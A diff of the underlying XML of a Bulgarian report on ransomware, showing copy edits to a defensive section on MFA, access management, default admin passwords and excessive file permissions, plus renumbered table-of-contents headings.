+        <w:t xml:space="preserve">потребители, които не използват </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9466,10 +10323,37 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Multi factor authentication </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">заменят процеса с двете пароли към аутентикация с пръстов отпечатък, лицево разпознаване, ПИН на устройството или криптографичен ключ. </w:t>
+        <w:t>MFA</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">заменят процеса с двете пароли към </w:t>
+      </w:r>
+      <w:r>
+        <w:t>автентикация</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> с пръстов отпечатък, лицево разпознаване, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PIN</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на устройството или криптограф</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ски</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ключ. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9486,7 +10370,31 @@
         <w:t xml:space="preserve">Identity and Access Management (IAM) </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">системи, за да могат администраторите за мониторинг и менажиране на роли, достъп до мрежи на </w:t>
+        <w:t xml:space="preserve">системи, за да могат администраторите </w:t>
+      </w:r>
+      <w:r>
+        <w:t>да</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">наблюдават и менажират </w:t>
+      </w:r>
+      <w:r>
+        <w:t>роли,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> да следят </w:t>
+      </w:r>
+      <w:r>
+        <w:t>достъп</w:t>
+      </w:r>
+      <w:r>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> до мрежи на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9512,7 +10420,31 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Подмяна на админските пароли. Често по време на разработка на дадена услуга/апликация, програмистите използват пароли, които са известни на целия екип, за да си улеснят работния процес. Това е приемливо, когато продуктът не е </w:t>
+        <w:t xml:space="preserve">Подмяна на </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">административните </w:t>
+      </w:r>
+      <w:r>
+        <w:t>пароли</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> преди продукта да е пуснат на пазара</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>При</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> разработка</w:t>
+      </w:r>
+      <w:r>
+        <w:t>та на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> дадена услуга/апликация, програмистите използват пароли, които са известни на целия екип, за да си улеснят работния процес. Това е приемливо, когато продуктът не е </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -9520,13 +10452,16 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> и само се тестват функционалностите. Ако тези пароли останат в </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>codebase</w:t>
+        <w:t xml:space="preserve"> и само се тестват функционалностите</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> му</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Ако тези пароли останат в</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> кода</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, тогава хакерът има </w:t>
@@ -9547,16 +10482,45 @@
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
-        <w:t>Същото важи и за акаунти с</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> root access,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> които се използват за ежедневни задачи.</w:t>
+        <w:t>Същото важи и за</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>umask</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 000 или подобен, където дава твърде много правомощия за четене, изпълнени и писане върху файловете. А</w:t>
+      </w:r>
+      <w:r>
+        <w:t>каунти с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> root access</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> които се използват за ежедневни задачи</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>също попадат в тази категория</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9611,8 +10575,13 @@
       <w:pPr>
         <w:ind w:firstLine="360"/>
       </w:pPr>
-      <w:r>
-        <w:t>Токени и други</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Токени</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и други</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9777,14 +10746,15 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2539453B" wp14:editId="524CEDBD">
-            <wp:extent cx="5471160" cy="1966047"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2539453B" wp14:editId="5C747EF4">
+            <wp:extent cx="4476997" cy="1608798"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="470062905" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
@@ -9806,7 +10776,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5480519" cy="1969410"/>
+                      <a:ext cx="4518517" cy="1623718"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -14108,11 +15078,12 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
 <file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
@@ -14311,12 +15282,11 @@
 </file>
 
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
 </file>
 
 <file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
@@ -14480,11 +15450,9 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>
@@ -14509,9 +15477,11 @@
 </file>
 
 <file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -570,7 +570,7 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -582,7 +582,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223545520" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896477" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -610,7 +610,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545520 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896477 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -650,10 +650,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545521" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896478" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -688,7 +688,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545521 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896478 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -728,10 +728,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545522" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896479" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -766,7 +766,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545522 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896479 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -807,10 +807,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545523" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896480" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -822,34 +822,34 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ранна фаза на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Ранна фаза на </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -860,7 +860,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545523 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896480 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -901,10 +901,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545524" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896481" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -916,49 +916,49 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> използващ </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>RSA</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> криптиране</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> използващ </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>RSA</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> криптиране</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -969,7 +969,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545524 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896481 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1010,10 +1010,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545525" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896482" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1026,27 +1026,27 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Spear phishing Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Spear phishing Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1057,7 +1057,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545525 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896482 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1098,10 +1098,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545526" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896483" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1114,49 +1114,49 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> в </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Android </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>базирани системи</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> в </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Android </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>базирани системи</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1167,7 +1167,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545526 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896483 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1208,10 +1208,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545527" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896484" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1223,42 +1223,42 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t xml:space="preserve">Big Game Hunting (BGH) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">и </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Big Game Hunting (BGH) </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">и </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1269,7 +1269,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545527 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896484 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1309,46 +1309,24 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545528" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896485" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Ролята на </w:t>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Ransomware</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">AI </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">в </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> атаките</w:t>
+              </w:rPr>
+              <w:t xml:space="preserve"> в България</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1369,7 +1347,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545528 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896485 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1409,16 +1387,16 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545529" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896486" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t xml:space="preserve">Имплементация на </w:t>
+              <w:t xml:space="preserve">Ролята на </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1426,10 +1404,32 @@
                 <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t xml:space="preserve">AI </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">в </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
               <w:t>Ransomware</w:t>
             </w:r>
             <w:r>
